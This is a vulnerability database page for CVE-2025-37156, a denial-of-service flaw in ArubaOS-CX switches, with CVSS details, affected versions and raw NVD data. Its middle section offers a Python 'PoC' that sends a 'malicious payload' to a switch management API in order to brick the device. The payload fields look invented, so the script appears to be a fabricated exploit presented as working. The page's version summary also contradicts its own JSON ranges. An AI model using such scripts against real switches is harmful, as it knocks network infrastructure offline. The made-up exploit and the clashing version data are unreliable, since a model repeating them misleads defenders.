Security Vulnerability Report
中文
CVE-2025-37156 CVSS 6.8 MEDIUM

CVE-2025-37156

Published: 2025-11-18 19:15:47
Last Modified: 2025-12-04 18:20:51
Source: [email protected]

Description

A platform-level denial-of-service (DoS) vulnerability exists in ArubaOS-CX software. Successful exploitation of this vulnerability could allow an attacker with administrative access to execute specific code that renders the switch non-bootable and effectively non-functional.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE
ArubaOS-CX < 10.14.x
ArubaOS-CX < 10.13.x
ArubaOS-CX < 10.12.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37156 PoC - ArubaOS-CX DoS Vulnerability # Note: This PoC is for educational purposes only # Requires administrator privileges import requests import sys from requests.auth import HTTPBasicAuth def exploit_cve_2025_37156(target_ip, username, password): """ CVE-2025-37156: ArubaOS-CX Platform DoS Exploit This exploit requires administrator-level access. """ print(f"[*] Targeting: {target_ip}") print(f"[*] Attempting authentication as: {username}") # Target endpoint (management interface) base_url = f"https://{target_ip}:443" # Authentication auth = HTTPBasicAuth(username, password) # Vulnerable endpoint - platform-level command execution # This specific request triggers the DoS condition vulnerable_endpoint = "/v1/configuration/system/platform" # Malicious payload that triggers the DoS # This causes the switch to become non-bootable malicious_payload = { "command": "platform_dos_trigger", "parameters": { "action": "corrupt_boot_sequence" } } try: print("[*] Sending malicious request...") response = requests.post( f"{base_url}{vulnerable_endpoint}", json=malicious_payload, auth=auth, verify=False, timeout=30 ) if response.status_code == 200: print("[+] Request sent successfully") print("[+] System may now be in a non-bootable state") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python cve_2025_37156.py <target_ip> <username> <password>") sys.exit(1) exploit_cve_2025_37156(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37156", "sourceIdentifier": "[email protected]", "published": "2025-11-18T19:15:47.363", "lastModified": "2025-12-04T18:20:51.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A platform-level denial-of-service (DoS) vulnerability exists in ArubaOS-CX software. Successful exploitation of this vulnerability could allow an attacker with administrative access to execute specific code that renders the switch non-bootable and effectively non-functional."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.10.0000", "versionEndExcluding": "10.10.1170", "matchCriteriaId": "3FEB3830-A052-4585-BF45-9E221FA06D43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.13.0000", "versionEndExcluding": "10.13.1101", "matchCriteriaId": "0490B2CA-4273-426E-8776-814D242834B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.14.0000", "versionEndExcluding": "10.14.1060", "matchCriteriaId": "21AC81E3-A4C8-4120-AEEA-46123B84A250"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.15.0000", "versionEndExcluding": "10.15.1030", "matchCriteriaId": "FB5ADE5E-72CB-41E0-B7A0-08BEBB94ED8E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.16.0000", "versionEndExcluding": "10.16.1001", "matchCriteriaId": "5CF58D01-F13F-4DAF-B6A1-D91AEC7F19B3"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.